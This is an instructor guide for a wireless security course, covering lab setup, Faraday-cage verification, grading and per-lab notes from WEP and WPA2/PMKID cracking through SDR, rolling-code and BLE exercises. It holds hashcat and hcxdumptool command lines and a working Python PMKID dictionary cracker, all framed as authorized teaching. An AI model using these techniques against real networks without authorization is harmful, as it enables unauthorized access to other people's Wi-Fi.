Course Philosophy
WIR-101 treats wireless as a physical-layer attack surface, not just a protocol stack. Students who finish this course can reason about RF propagation, modulation schemes, and hardware constraints, not just run Aircrack scripts. The capstone requires them to build a working RF communication channel from scratch using GNU Radio and an SDR platform, which forces engagement with signal math rather than tool-wrapping.
The course runs in two interleaved tracks:
- Wi-Fi / authentication attack track (Weeks 1-7): protocol-centric, builds on NET-101 + SEC-101 knowledge
- RF / SDR track (Weeks 8-11 + capstone): signal-centric, requires the Lyons DSP and PySDR readings
Students who come in strong on networking often struggle in Weeks 8-9 when the emphasis shifts to signal math. Budget additional office hours in that stretch.
Lab Environment Requirements
Network Infrastructure
The in-lab wireless network MUST be air-gapped from production infrastructure. Configure a dedicated wireless router for lab use:
Lab AP: SSID = "VCA-WIR101-LAB"
Security: WPA2-PSK (for attack labs) or WPA3-SAE (for Week 6 comparison)
Channel: Fixed (e.g., 6 for 2.4 GHz, 36 for 5 GHz)
DHCP scope: 192.168.200.0/24
Uplink: None (isolated)
Instructor connects a second "target" AP for deauthentication and PMKID labs. Label it clearly: "AUTHORIZED LAB TARGET ONLY."
Never allow live internet-connected APs in the monitor-mode lab area. Students' Alfa NICs will capture all traffic in range.
Sub-GHz Lab Equipment
| Item | Quantity | Purpose |
|---|---|---|
| RTL-SDR v4 | 1 per student | Receive-only spectrum work |
| ANTSDR E200 | 1 per 4-student cohort | TX/RX for PSK + rolling-code labs |
| Instructor rolling-code demo device | 1 per room | Lab 9 authorized target |
| HackRF One (optional) | Instructor-only | Demo wide-band TX scans |
| RF-shielded enclosure | 1 per TX station | Contain all live transmissions |
Rolling-code demo device: The instructor must build this before the course begins. Use a microcontroller (Arduino Uno or ESP32) with a simple seed-based PRNG that outputs a 32-bit rolling code via a 433 MHz ASK transmitter module. Do NOT use a real garage door opener remote or a real vehicle key fob as a lab target. Those are consumer devices under real-world deployment; Rolljam against them is a CFAA violation outside an explicitly authorized pentest scope.
Faraday Cage Policy
Any active RF transmission during Labs 8-11 and the capstone MUST occur inside the provided Faraday cage. Verify attenuation before each lab session:
# The RTL-SDR stays outside the cage for both scans and the demo transmitter is keyed on for both.
# Scan the whole 433 MHz ISM band (433.05-434.79 MHz): the usual ASK modules sit at 433.92 MHz,
# which a scan that stops at 433.5 MHz would miss entirely.
# 1. Transmitter inside, cage OPEN: record the reference level.
rtl_power -f 433000000:435000000:10000 -g 40 -1 open.csv
# 2. Transmitter inside, cage CLOSED: repeat the identical scan.
rtl_power -f 433000000:435000000:10000 -g 40 -1 caged.csv
# 3. Compare the peak bin between the two files. Acceptable: >= 40 dB drop.
#    If the caged peak sits at the noise floor, the figure is only a lower bound on the attenuation.
Remote students are exempt (virtual path; no live TX).
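The comparison in step 3 is easy to get wrong by eye (rtl_power writes one row per tuner hop and the peak bin must be located in the open-cage scan, not the caged one). The script below is an added example for this instructor guide, not part of the course kit: it parses two rtl_power CSV files, finds the transmitter's bin in the open scan, reports the drop when caged, and flags the case where the caged reading is buried in the noise floor. The CSV rows it builds for itself are constructed test data; on real files call cage_passes(open("open.csv").read(), open("caged.csv").read()).

```python
"""Attenuation check from two rtl_power scans: cage open vs. cage closed.

Added example for the cage-verification step above; not part of the course
kit. rtl_power writes one CSV row per frequency hop:
    date, time, hz_low, hz_high, hz_step, samples, dB, dB, ...
where each dB value is the power in one bin of width hz_step starting at
hz_low. constructed_scan() fabricates such rows (a 433.92 MHz transmitter
over a -70 dB floor) so the check runs without hardware.
"""
import csv
import io
import statistics


def parse_rtl_power(text):
    """Return {bin_centre_hz: strongest dB seen in that bin} for a whole scan."""
    bins = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 7:
            continue
        hz_low, hz_step = float(row[2]), float(row[4])
        for i, value in enumerate(row[6:]):
            centre = hz_low + hz_step * (i + 0.5)
            db = float(value)
            bins[centre] = max(db, bins.get(centre, db))   # keep the strongest sweep
    return bins


def attenuation_report(open_scan, caged_scan, noise_margin_db=6.0):
    """Locate the transmitter in the open-cage scan and measure its drop when caged.

    If the caged reading in that bin sits within noise_margin_db of the caged
    scan's median (the noise floor), the leak is buried in noise and the
    attenuation figure is only a lower bound, not a measurement.
    """
    peak_hz = max(open_scan, key=open_scan.get)
    open_db, caged_db = open_scan[peak_hz], caged_scan[peak_hz]
    floor_db = statistics.median(caged_scan.values())
    return {
        "peak_hz": peak_hz,
        "open_db": open_db,
        "caged_db": caged_db,
        "attenuation_db": open_db - caged_db,
        "lower_bound": (caged_db - floor_db) < noise_margin_db,
    }


def cage_passes(open_csv, caged_csv, required_db=40.0):
    """Apply the course's >= 40 dB rule to two rtl_power CSV texts."""
    report = attenuation_report(parse_rtl_power(open_csv), parse_rtl_power(caged_csv))
    return report["attenuation_db"] >= required_db, report


def constructed_scan(peak_db, hz_low=433_000_000, hz_step=10_000, n_bins=200, floor_db=-70.0):
    """One-row rtl_power CSV with a single peak at 433.92 MHz (constructed data)."""
    values = [floor_db] * n_bins
    values[(433_920_000 - hz_low) // hz_step] = peak_db
    head = "%s, %s, %d, %d, %.2f, 4096" % (
        "2024-01-01", "12:00:00", hz_low, hz_low + hz_step * n_bins, hz_step)
    return head + ", " + ", ".join("%.2f" % v for v in values) + "\n"


if __name__ == "__main__":
    for caged_peak in (-65.0, -45.0):
        ok, report = cage_passes(constructed_scan(-20.0), constructed_scan(caged_peak))
        note = " (lower bound: leak is below the noise floor)" if report["lower_bound"] else ""
        print("%s: %.1f dB at %.3f MHz%s" % ("PASS" if ok else "FAIL",
              report["attenuation_db"], report["peak_hz"] / 1e6, note))
```

The lower-bound flag matters for the sign-off sheet: a caged reading at the noise floor proves the leak is at least 40 dB down, but a better gain setting or a closer antenna would be needed to quote an actual attenuation figure.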
Grading Rubrics
Lab Rubric (each lab, 100 points base)
| Category | Weight | Notes |
|---|---|---|
| Technical deliverable | 50% | Tool output, IQ analysis, capture files, code |
| Analysis and write-up | 30% | Explanation of what happened and why; defense recommendation |
| Authorization discipline | 20% | Correct targets only; no scope creep; checklist signed |
Authorization discipline is a hard gate: any unauthorized capture or transmission results in a 0 for the lab and triggers an ethics incident review (see below). No partial credit.
Weekly Homework Rubric (45-min reading + 60-min hands-on)
| Category | Weight |
|---|---|
| Comprehension check (3-5 short questions from reading) | 40% |
| Hands-on deliverable (tool output, IQ file, code snippet) | 60% |
Capstone Rubric
See CAPSTONE.md for the full 5-day rubric. Summary weights:
- Technical execution: 40% (RF signal quality, protocol correctness, attack chain completeness)
- Report craft: 30% (findings format, CVSS scoring, remediation specificity)
- Engagement discipline: 30% (authorization chain, Faraday compliance, scope adherence)
- Binary gates: pass/fail prerequisites that block grading if not met
Lab-by-Lab Notes
Lab 1 — RF Fundamentals + Spectrum Survey
Common issue: Students plug in the RTL-SDR v4 without blacklisting the dvb_usb_rtl28xxu kernel module, so the kernel's DVB driver claims the dongle and GQRX fails to open the device. Pre-provision all student machines before class with a file in /etc/modprobe.d containing "blacklist dvb_usb_rtl28xxu" (a reboot or rmmod is needed if the module is already loaded; lsmod | grep dvb_usb should print nothing afterwards). Verify with rtl_test: it should report the R828D tuner and run its sample-loss test without a usb_claim_interface error. Note that rtl_test -t is the E4000 tuner-range test and aborts on the R828D in the v4, so it is not a useful smoke test for this dongle.
Point students at FM broadcast stations (88-108 MHz) for first-contact success before moving to 2.4 GHz ISM band survey. The psychological payoff of tuning in a radio station anchors their confidence before abstract spectrum analysis begins.
Lab 2 — 802.11 Monitor Mode + Frame Dissection
Confirm each student's Alfa NIC supports monitor mode before class. Run iw phy phy0 info | grep monitor to verify (substitute the right phy index from iw phy if the adapter is not phy0; "monitor" should appear under "Supported interface modes"). Some batches of the AWUS036ACM ship with firmware that needs an update for 5 GHz monitor mode.
In the Wireshark dissection exercise, filter for wlan.fc.type_subtype == 0x08 (Beacon frames) first. Students get overwhelmed by raw 802.11 traffic; beacon-first focus gives them a readable starting point.
Lab 3 — WEP Crack
WEP-capable routers are increasingly hard to source. Recommend keeping 1-2 older Linksys WRT54G units; WEP is still configurable on their stock firmware and on DD-WRT. The lab can also run against a WEP-configured virtual AP on the instructor machine using hostapd, but hostapd 2.10 and later are built without WEP unless compiled with CONFIG_WEP=y, so a distro package may reject the configuration.
The radiotap pseudo-header prepended to monitor-mode captures (and the older PRISM header that some drivers emit instead) confuses students coming from Ethernet Wireshark experience, because they expect the frame to begin at the 802.11 header. Spend 10 minutes on radiotap (its length field, and the channel and signal-strength fields the later labs rely on) before the capture exercise.
Lab 4 — WPA2-PSK 4-Way Handshake Capture + Crack
This lab requires the "authorized target" AP. Double-check that no production APs are within capture range. The airodump-ng sweep will show them; students must be briefed not to capture from or deauth production networks.
Hashcat GPU modes: if students do not have a discrete GPU, hashcat can run on the CPU OpenCL device (-D 1 selects device type 1 = CPU; there is no --device cpu option), but it is slow. Provide a wordlist bounded to ~50k entries for class time (full rockyou.txt takes too long on CPU). The hcxdumptool PMKID variant (Lab 5) is better for demonstrating offline attack speed.
Lab 5 — PMKID Attack
Emphasize: the PMKID attack does not need a legitimate client to be connected or deauthenticated. The attacker's own adapter associates with the AP (association needs only the SSID, not the passphrase), and the first EAPOL message the AP sends carries the PMKID, which is derived only from the PMK and the two MAC addresses. This is the pedagogically important differentiator from the 4-way handshake capture. Draw the association request followed by EAPOL message 1 on the whiteboard before students run hcxdumptool. Not every AP includes the PMKID in message 1; confirm the lab target does before class.
hcxdumptool --enable_status=1 -i wlan0mon -o out.pcapng: the --enable_status flag produces console feedback; without it students think the tool is stalled. Option names changed between hcxdumptool major versions (6.3 replaced -o with -w and --enable_status with --rds), so check hcxdumptool --help on the installed version before printing the lab sheet.
For hashcat: hcxpcapngtool -o hash.22000 out.pcapng then hashcat -m 22000 hash.22000 wordlist.txt. The old -m 2500 (handshake) and -m 16800 (PMKID) modes are deprecated in hashcat 6.x and refuse to run by default; mode 22000 handles both hash types from the same file.
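Students often treat hashcat as a black box, so it helps to show the arithmetic it performs for each candidate. The script below is an added example for this guide, not course material and not a substitute for hashcat: it derives the PMK exactly as both the Lab 4 handshake attack and the Lab 5 PMKID attack do (PBKDF2-HMAC-SHA1 over the passphrase and SSID, 4096 rounds), computes the WPA2-PSK PMKID, writes it in the hash.22000 line format hcxpcapngtool produces, and runs a dictionary attack on that line. The SSID, MAC addresses and passphrase are constructed; the only real data is the IEEE 802.11 PBKDF2 test vector used as a self-check.

```python
"""PMKID derivation and the offline dictionary step, in pure Python.

Added example for Labs 4 and 5; not course material and not a replacement
for hashcat, just the arithmetic hashcat -m 22000 performs per candidate so
students can see where the cost is. Both labs derive the same
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); for
WPA2-PSK the PMKID is HMAC-SHA1(PMK, "PMK Name" || AP_MAC || STA_MAC)
truncated to 128 bits. Nothing in that formula involves a legitimate
client, which is why the attacker's own association is enough. The
SSID/MACs/passphrase in __main__ are constructed; the IEEE test vector in
known_answer_ok() is the only real data.
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK PMK: 4096 rounds of PBKDF2-HMAC-SHA1 (this is the expensive step)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA) for AKM 00-0F-AC:2 (WPA2-PSK)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def hashcat_22000_line(pmkid_hex: str, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """Format a captured PMKID the way hcxpcapngtool writes hash.22000 (type 01 = PMKID)."""
    return "WPA*01*%s*%s*%s*%s***" % (
        pmkid_hex.lower(), mac_bytes(ap_mac).hex(), mac_bytes(sta_mac).hex(), ssid.encode().hex())


def crack_pmkid(line: str, wordlist):
    """Dictionary attack on one hash.22000 PMKID line; returns the passphrase or None."""
    fields = line.split("*")
    if fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID (type 01) line")
    target = bytes.fromhex(fields[2])
    aa, spa = bytes.fromhex(fields[3]), bytes.fromhex(fields[4])
    ssid = bytes.fromhex(fields[5]).decode()
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:       # WPA2 passphrase length rule: skip cheaply
            continue
        if hmac.compare_digest(compute_pmkid(derive_pmk(candidate, ssid), aa, spa), target):
            return candidate
    return None


def known_answer_ok() -> bool:
    """IEEE 802.11 PBKDF2 test vector: passphrase "password", SSID "IEEE"."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


if __name__ == "__main__":
    ssid, ap, sta = "VCA-WIR101-LAB", "02:00:00:aa:bb:cc", "02:00:00:11:22:33"   # constructed
    pmkid = compute_pmkid(derive_pmk("lab-passphrase", ssid), mac_bytes(ap), mac_bytes(sta)).hex()
    line = hashcat_22000_line(pmkid, ap, sta, ssid)
    print(line)
    print("cracked:", crack_pmkid(line, ["password", "letmein1", "lab-passphrase"]))
    print("PBKDF2 known-answer test:", "ok" if known_answer_ok() else "FAILED")
```

Point out to students that every candidate costs a full 4096-round PBKDF2 and the HMAC afterwards is negligible; that is why the class wordlist is capped at ~50k entries on CPU and why GPUs change the picture.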
Lab 6 — Midterm (no lab file)
Written + practical midterm covering Weeks 1-5 material. Practical portion: students capture a WPA2 4-way handshake from the authorized lab AP, extract the hash, and run a dictionary attack. Provide the correct passphrase in the wordlist to ensure the crack succeeds within class time.
Lab 7 — WPA3-SAE
Students need a WPA3-capable AP and WPA3-capable client adapters. WPA3 is mandatory for Wi-Fi 6 (802.11ax) certification, so any Wi-Fi 6 AP qualifies; many 802.11ac APs also gained SAE through firmware updates. The Alfa AWUS036ACM supports WPA3-SAE in managed mode with a recent wpa_supplicant that has SAE enabled. Monitor-mode capture is less rewarding than for WPA2: the SAE commit and confirm exchange rides in 802.11 authentication frames, and although a 4-way handshake still follows, the PMK it uses comes from the Dragonfly exchange rather than directly from the passphrase, so a captured handshake gives the Lab 4 offline dictionary attack nothing to work on.
Demo the Dragonblood (2019) timing attack conceptually. Do not attempt live exploitation; it requires custom patched drivers and is outside the lab scope. The conceptual demonstration using CVE-2019-9494 / CVE-2019-9496 writeups is sufficient.
Lab 8 — Sub-GHz Spectrum + ISM Band Mapping
First RTL-SDR lab for most students. The smoke test from SETUP.md should have verified basic operation. Common failure: students tune GQRX to 433.92 MHz and expect to see the whole sub-GHz picture, but the RTL-SDR's usable instantaneous bandwidth is about 2 MHz (its sample rate tops out near 2.4 MS/s), so anything outside that slice is simply invisible in the waterfall. Use rtl_power, which hops the tuner across the requested span, for wide-band surveys rather than the GQRX waterfall.
Have students scan for local ISM activity: 315 MHz (US automotive), 433 MHz (EU automotive + sensors), 868 MHz (EU LoRa), 915 MHz (US LoRa). In most classroom environments students will find wireless temperature sensors, remote power outlets, and possibly garage door remotes operating in these bands.
Lab 9 — SDR RX + IQ Analysis / PSK 3-Way / Rolling-Code
This is the most complex lab in the course. Split into three sequential exercises:
Exercise A (all students): IQ capture and demodulation using a pre-recorded .sigmf capture of a sub-GHz ASK transmission. Students demodulate, threshold, and decode the bitstream in Python. No hardware required; uses the virtual path files.
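For instructors who want a reference solution to compare student notebooks against, the following is an added example for this guide, not the course's own script or its .sigmf recording. It synthesises an OOK burst as IQ samples (carrier keyed on for a 1, off for a 0, offset 20 kHz from the tuned centre, with noise; all constructed) and then applies exactly the three steps the exercise asks for: envelope, threshold, sample once per symbol. The sample rate, baud rate and preamble are assumptions for the synthetic capture; on a real .sigmf-data file use load_sigmf_data(), take the sample rate from core:sample_rate in the .sigmf-meta, and read the baud rate off the waterfall.

```python
"""ASK/OOK demodulation of a sub-GHz IQ capture, numpy only.

Added example for Exercise A; not the course script or its .sigmf recording.
ook_modulate() synthesises what the real capture looks like (carrier keyed
on for a 1, off for a 0, 20 kHz off the tuned centre, plus noise; all
constructed), and ook_demodulate() applies the three steps the exercise
asks for: envelope, threshold, sample once per symbol. For a real
.sigmf-data file use load_sigmf_data() and take FS from core:sample_rate in
the .sigmf-meta; the baud rate is read off the waterfall.
"""
import numpy as np

FS = 250_000            # sample rate, S/s (assumed for the synthetic capture)
BAUD = 2_000            # symbol rate of the ASK transmitter (assumed)
SPS = FS // BAUD        # samples per symbol = 125
PREAMBLE = [1, 0] * 4   # 0xAA-style sync pattern the decoder locks onto (assumed)


def load_sigmf_data(path):
    """Read a .sigmf-data file recorded as cf32_le (the GQRX/GNU Radio default)."""
    return np.fromfile(path, dtype=np.complex64)


def frame(payload: bytes):
    """Bits on the air: 4 idle symbols, preamble, payload MSB-first, 4 idle symbols."""
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    return [0] * 4 + PREAMBLE + bits + [0] * 4


def ook_modulate(bits, snr_db=20.0, f_offset=20_000.0, seed=1):
    """Synthetic receiver IQ for an OOK burst (constructed, stands in for the capture)."""
    rng = np.random.default_rng(seed)
    envelope = np.repeat(np.asarray(bits, dtype=float), SPS)
    t = np.arange(envelope.size) / FS
    iq = envelope * np.exp(2j * np.pi * f_offset * t)        # keyed carrier at +20 kHz
    noise_amp = 10 ** (-snr_db / 20) / np.sqrt(2)             # per component, unit signal power
    iq = iq + noise_amp * (rng.standard_normal(iq.size) + 1j * rng.standard_normal(iq.size))
    return iq.astype(np.complex64)


def ook_demodulate(iq):
    """Envelope -> smooth -> threshold -> resample at symbol centres -> bit list."""
    envelope = np.abs(iq)                                     # OOK ignores phase and offset
    width = max(SPS // 4, 1)
    smooth = np.convolve(envelope, np.ones(width) / width, mode="same")
    threshold = (np.percentile(smooth, 95) + np.percentile(smooth, 5)) / 2  # midpoint of on/off
    hard = smooth > threshold
    rising = np.flatnonzero(np.diff(hard.astype(np.int8)) == 1)
    if rising.size == 0:
        return []                                             # no burst in this capture
    first_symbol_start = rising[0] + 1
    centres = np.arange(first_symbol_start + SPS // 2, hard.size, SPS)
    return hard[centres].astype(int).tolist()


def decode(bits):
    """Find the preamble, then pack the bits that follow into bytes (MSB first)."""
    n = len(PREAMBLE)
    for i in range(len(bits) - n + 1):
        if bits[i:i + n] == PREAMBLE:
            payload = bits[i + n:]
            payload = payload[: len(payload) // 8 * 8]
            return bytes(int("".join(map(str, payload[j:j + 8])), 2)
                         for j in range(0, len(payload), 8))
    return b""


def loopback(payload: bytes, snr_db=20.0, seed=1) -> bytes:
    """Modulate, demodulate and decode one payload; returns what the receiver recovered."""
    return decode(ook_demodulate(ook_modulate(frame(payload), snr_db=snr_db, seed=seed)))


if __name__ == "__main__":
    sent = bytes([0xA5, 0x5A, 0x3C])
    print("sent %s recovered %s" % (sent.hex(), loopback(sent).hex()))
```

Two things worth drawing out in class: the demodulator never touches the 20 kHz offset because the envelope discards phase, and symbol timing comes from the first rising edge, so a capture that starts mid-burst loses its first byte unless the preamble is re-found.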
Exercise B (in-lab students with ANTSDR or HackRF access): Build a BPSK TX/RX chain in GNU Radio. Transmit inside the Faraday cage. The "3-way handshake" is demonstrated as: TX sends "SYN" in BPSK (binary 0x01), RX demodulates and replies "SYN-ACK" (0x03), TX replies "ACK" (0x02). This is a toy protocol over BPSK, not TCP -- the pedagogical point is that handshakes can operate at the physical layer, not above it.
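The flowgraph itself has to be built in GNU Radio, but the protocol logic is easier to reason about (and to grade) when it runs in a simulation. The following is an added example for this guide, not the course flowgraph: it models the BPSK TX/RX chain numerically with a fixed carrier phase rotation and noise (a constructed channel), resolves BPSK's 180-degree phase ambiguity with a one-symbol pilot, and drives the SYN/SYN-ACK/ACK state machine described above across that channel. The samples-per-symbol value and the pilot are assumptions; the opcodes are the ones in the lab text.

```python
"""Toy three-way handshake over BPSK (Exercise B), simulated in numpy.

Added example, not the course's GNU Radio flowgraph: it models the TX/RX
chain numerically so the protocol logic can be checked without an SDR or
the cage. Each burst carries one byte at 16 samples per symbol behind a
one-symbol +1 pilot; the channel (constructed) applies a fixed carrier
phase rotation plus AWGN. The opcodes follow the lab text: SYN=0x01,
SYN-ACK=0x03, ACK=0x02. In GNU Radio the phase recovery below is the job
of the Costas Loop block; here it is a squaring estimate plus the pilot.
"""
import numpy as np

SPS = 16                                  # samples per symbol (assumed)
SYN, SYN_ACK, ACK = 0x01, 0x03, 0x02      # opcodes from the lab sheet


def bpsk_modulate(byte: int):
    """Pilot symbol +1, then bit 0 -> +1 and bit 1 -> -1, each held for SPS samples."""
    bits = [(byte >> (7 - k)) & 1 for k in range(8)]
    symbols = np.array([1.0] + [1.0 - 2.0 * b for b in bits])
    return np.repeat(symbols, SPS).astype(complex)


def channel(iq, phase_rad, snr_db, rng):
    """Constant carrier phase offset plus complex AWGN (constructed channel model)."""
    noise_amp = 10 ** (-snr_db / 20) / np.sqrt(2)
    noise = noise_amp * (rng.standard_normal(iq.size) + 1j * rng.standard_normal(iq.size))
    return iq * np.exp(1j * phase_rad) + noise


def bpsk_demodulate(iq) -> int:
    """Coherent BPSK demod: squaring phase estimate, integrate per symbol, pilot fixes the sign.

    Squaring strips the data (+-1 squared is 1), so angle(mean(iq**2))/2 is the
    carrier phase modulo 180 degrees; the pilot says which half-turn is right.
    """
    phase = np.angle(np.mean(iq ** 2)) / 2
    baseband = np.real(iq * np.exp(-1j * phase))
    symbols = baseband.reshape(-1, SPS).mean(axis=1)   # integrate-and-dump per symbol
    if symbols[0] < 0:                                  # pilot must read +1
        symbols = -symbols
    bits = (symbols[1:] < 0).astype(int)                # -1 -> bit 1
    return int("".join(str(b) for b in bits), 2)


def loopback(byte: int, phase_rad=2.5, snr_db=10.0, seed=1) -> int:
    """One byte through modulate -> channel -> demodulate."""
    rng = np.random.default_rng(seed)
    return bpsk_demodulate(channel(bpsk_modulate(byte), phase_rad, snr_db, rng))


class Peer:
    """One side of the toy handshake. step() consumes a received opcode and returns
    the opcode to transmit next, or None when there is nothing to say. Unexpected
    opcodes are ignored, so a corrupted burst simply stalls the exchange."""

    def __init__(self, role: str):
        self.role, self.state = role, "CLOSED"

    def step(self, received=None):
        if self.role == "initiator" and self.state == "CLOSED":
            self.state = "SYN_SENT"
            return SYN
        if self.role == "responder" and self.state == "CLOSED" and received == SYN:
            self.state = "SYN_RCVD"
            return SYN_ACK
        if self.role == "initiator" and self.state == "SYN_SENT" and received == SYN_ACK:
            self.state = "ESTABLISHED"
            return ACK
        if self.role == "responder" and self.state == "SYN_RCVD" and received == ACK:
            self.state = "ESTABLISHED"
        return None


def run_handshake(snr_db=10.0, phase_rad=2.0, seed=7):
    """Drive both peers over the simulated channel; returns final states and a TX/RX log."""
    rng = np.random.default_rng(seed)
    initiator, responder = Peer("initiator"), Peer("responder")
    sender, receiver, opcode = initiator, responder, initiator.step()
    log = []
    while opcode is not None:
        received = bpsk_demodulate(channel(bpsk_modulate(opcode), phase_rad, snr_db, rng))
        log.append((sender.role, opcode, received))
        opcode = receiver.step(received)
        sender, receiver = receiver, sender
    return initiator.state, responder.state, log


if __name__ == "__main__":
    a_state, b_state, log = run_handshake()
    for role, sent, got in log:
        print("%-9s sent 0x%02x, peer decoded 0x%02x" % (role, sent, got))
    print("initiator:", a_state, "responder:", b_state)
```

A useful in-class variation is to lower snr_db until a burst is mis-decoded: the state machine stalls rather than desynchronising, which makes the point that the handshake's reliability is bounded by the physical layer underneath it.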
Exercise C (in-lab students): Rolling-code recording and analysis against the instructor demo device. Students record two consecutive codes with rtl_fm or URH, observe the counter increment, and explain why replaying the first code fails after the second has been accepted by the receiver. Rolljam is demonstrated by the instructor using the demo device; students do not perform the attack themselves (it requires precise timing).
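Both the demo device described under Sub-GHz Lab Equipment and the replay question in Exercise C come down to one receiver rule: accept a code only if it lies in a forward window past the last accepted counter, then advance. The model below is an added example for this guide, not the firmware on the instructor's board; its PRF is HMAC-SHA256 truncated to 32 bits (an assumption for the model; KeeLoq-style remotes encrypt the counter with a block cipher instead) and the seed is constructed. It reproduces the two outcomes students must explain: a naive replay fails once a later code has been accepted, and Rolljam succeeds only because the jammed receiver never advanced past the recorded code.

```python
"""Rolling-code transmitter and receiver model (Exercise C and the demo device).

Added example, not the firmware on the instructor's demo board. Transmitter
and receiver share a seed; each press sends code = PRF(seed, counter) and
the receiver accepts a code only if it matches one of the next WINDOW
counter values past the last accepted one, then moves its pointer forward.
The PRF here is HMAC-SHA256 truncated to 32 bits (an assumption for the
model; KeeLoq-style remotes encrypt the counter with a block cipher).
"""
import hashlib
import hmac
import struct

WINDOW = 16   # how many counter values ahead of the last accepted one the receiver will take
SEED = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed lab seed


def rolling_code(seed: bytes, counter: int) -> int:
    """32-bit code for a counter value; unpredictable without the seed."""
    mac = hmac.new(seed, struct.pack(">I", counter), hashlib.sha256).digest()
    return struct.unpack(">I", mac[:4])[0]


class Transmitter:
    def __init__(self, seed: bytes):
        self.seed, self.counter = seed, 0

    def press(self) -> int:
        code = rolling_code(self.seed, self.counter)
        self.counter += 1          # advances even if the receiver never hears the press
        return code


class Receiver:
    def __init__(self, seed: bytes):
        self.seed, self.last = seed, -1   # counter of the last accepted code

    def accept(self, code: int) -> bool:
        for c in range(self.last + 1, self.last + 1 + WINDOW):
            if rolling_code(self.seed, c) == code:
                self.last = c      # every counter at or below c is now dead
                return True
        return False               # replayed, stale, out of window, or forged


def naive_replay():
    """Record code 0, let code 1 be accepted, then replay code 0."""
    tx, rx = Transmitter(SEED), Receiver(SEED)
    c0 = tx.press()
    first = rx.accept(c0)
    c1 = tx.press()
    second = rx.accept(c1)
    return first, second, rx.accept(c0)       # (True, True, False)


def rolljam():
    """Attacker jams the receiver, records two presses, replays the first so the
    door opens for the victim, and keeps the second (still in-window) for later."""
    tx, rx = Transmitter(SEED), Receiver(SEED)
    recorded = [tx.press(), tx.press()]       # both presses jammed: rx never saw them
    opened_for_victim = rx.accept(recorded[0])
    opened_for_attacker = rx.accept(recorded[1])
    return opened_for_victim, opened_for_attacker   # (True, True)


if __name__ == "__main__":
    print("naive replay (accept c0, accept c1, replay c0):", naive_replay())
    print("rolljam (replay c0 for victim, c1 later for attacker):", rolljam())
```

The window is also why a remote pressed many times out of range stops working: once the transmitter's counter is more than WINDOW ahead, nothing it sends matches, and a real receiver needs a resynchronisation procedure that this model deliberately omits.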
Budget 3 hours for this lab.
Lab 10 — BLE Sniffing + GATT Enumeration
Requires a BLE sniffer: an nRF52840 dongle running Nordic's nRF Sniffer for Bluetooth LE firmware, a TI CC26x2/CC1352 board running Sniffle (Sniffle does not target the nRF52840), or the LimeSDR. Most students do not own a sniffer; have two or three available for lab rotation. The virtual path uses pre-captured .pcap files from a known BLE device.
gatttool is deprecated in BlueZ; steer students toward bluetoothctl (its gatt submenu: menu gatt, then list-attributes, select-attribute, read) or the Python bleak library instead.
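Before students enumerate GATT they have to identify the device from its advertisements, and Wireshark's dissection hides how simple the on-air format is. The parser below is an added example for this guide, not from the course pcap set: it splits raw advertising data into its AD structures ([length][AD type][length-1 bytes]), decodes the fields students care about, and rejects a truncated packet instead of reading past the end. The sample advertisement is constructed; 0xFFFF is the Bluetooth SIG's reserved test company ID.

```python
"""BLE advertising-data (AD structure) parser for Lab 10 captures.

Added example; the packet below is constructed, not from the course pcap set.
Advertising and scan-response payloads are a run of AD structures, each
[length][AD type][length-1 bytes]. Multi-byte values are little-endian, so
the 16-bit Battery Service UUID 0x180F appears on the air as 0F 18.
"""
import struct

AD_FLAGS, AD_UUID16_COMPLETE, AD_LOCAL_NAME, AD_MANUFACTURER = 0x01, 0x03, 0x09, 0xFF


def parse_ad_structures(payload: bytes):
    """Split raw advertising data into (ad_type, data) tuples; reject truncation."""
    out, i = [], 0
    while i < len(payload):
        length = payload[i]
        if length == 0:                        # zero-length padding ends the payload
            break
        if i + 1 + length > len(payload):
            raise ValueError("truncated AD structure at offset %d" % i)
        out.append((payload[i + 1], bytes(payload[i + 2:i + 1 + length])))
        i += 1 + length
    return out


def summarize(payload: bytes) -> dict:
    """Pull out the fields used to identify a lab device before GATT enumeration."""
    info = {"flags": None, "name": None, "uuid16": [], "manufacturer": None}
    for ad_type, data in parse_ad_structures(payload):
        if ad_type == AD_FLAGS and data:
            info["flags"] = data[0]
        elif ad_type == AD_LOCAL_NAME:
            info["name"] = data.decode("utf-8", errors="replace")
        elif ad_type == AD_UUID16_COMPLETE:
            even = data[: len(data) // 2 * 2]  # ignore a dangling odd byte
            info["uuid16"] = [u for (u,) in struct.iter_unpack("<H", even)]
        elif ad_type == AD_MANUFACTURER and len(data) >= 2:
            info["manufacturer"] = (struct.unpack("<H", data[:2])[0], data[2:])
    return info


# Constructed advertisement: flags 0x06 (LE general discoverable, no BR/EDR),
# name "WIR101-LAB", Battery Service UUID, manufacturer 0xFFFF with 2 data bytes.
SAMPLE_ADV = bytes.fromhex(
    "020106"
    + "0b09" + b"WIR101-LAB".hex()
    + "03030f18"
    + "05ffffff0102"
)


if __name__ == "__main__":
    for ad_type, data in parse_ad_structures(SAMPLE_ADV):
        print("type 0x%02x: %s" % (ad_type, data.hex()))
    print(summarize(SAMPLE_ADV))
```

The truncation check is the practitioner's point: a length byte that runs past the end of the payload is exactly the malformed input a fuzzed or hostile peripheral produces, and a parser that trusts it reads garbage at best.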
Lab 11 — Wi-Fi Wardriving + Report
Students use Kismet in wardriving mode (passive; no injection). Configure Kismet to write both the kismet database and pcapng (log_types=kismet,pcapng in kismet_logging.conf); the KML for mapping is generated afterwards from the .kismet file with kismetdb_to_kml. Students drive (or walk) a defined route and produce a findings report mapping detected SSIDs, encryption types, channel distribution, and vendor breakdown.
